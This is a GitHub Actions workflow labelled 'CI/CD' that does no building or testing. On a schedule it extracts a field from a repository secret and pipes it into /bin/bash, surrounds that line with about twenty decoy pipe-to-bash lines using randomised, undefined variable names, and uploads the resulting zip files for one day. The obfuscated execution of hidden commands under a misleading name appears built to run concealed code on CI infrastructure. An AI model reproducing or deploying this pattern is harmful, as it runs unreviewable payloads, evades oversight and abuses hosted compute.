name: CI/CD
on:
  workflow_dispatch:

  schedule:
    - cron: '46 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Start
        env:
          oulmx43: ${{ secrets.oulmx43 }}
        run: |
          printf '%s' "$oulmx43" | jq -r .ohn36 | /bin/bash
          echo $av6 | jq -r .cwbav2151 | /bin/bash
          printf '%s' "$pfs3176" | jq -r .y59 | /bin/bash
          printf '%s' "$e14" | jq -r .dslv26 | /bin/bash
          echo $ydlck3811 | jq -r .yel8737 | /bin/bash
          printf '%s' "$pe513" | jq -r .fnxpd7 | /bin/bash
          echo $yih4302 | jq -r .rw849 | /bin/bash
          printf '%s' "$cn5823" | jq -r .yrw4 | /bin/bash
          printf '%s' "$e87559" | jq -r .s24 | /bin/bash
          printf '%s' "$xdtk101" | jq -r .hew15837 | /bin/bash
          echo $mus1494 | jq -r .lle1852 | /bin/bash
          echo $na1505 | jq -r .fjrkf9380 | /bin/bash
          echo $pwgsk64 | jq -r .kchqx74561 | /bin/bash
          echo $li28449 | jq -r .utv7886 | /bin/bash
          printf '%s' "$t53075" | jq -r .pkivy64574 | /bin/bash
          echo $umnyo0 | jq -r .rs6250 | /bin/bash
          printf '%s' "$q0298" | jq -r .f495 | /bin/bash
          printf '%s' "$zdx186" | jq -r .pebx8239 | /bin/bash
          printf '%s' "$yxe3" | jq -r .iu127 | /bin/bash
          echo $xrdg51 | jq -r .f5 | /bin/bash
          echo $gnf47600 | jq -r .plgy7 | /bin/bash
          echo $wpfta7237 | jq -r .zclc2820 | /bin/bash
          printf '%s' "$we3238" | jq -r .uvkdk043 | /bin/bash

      - name: Save output
        uses: actions/upload-artifact@v4
        with:
          name: rok4qaVC
          path: "*.zip"
          retention-days: 1
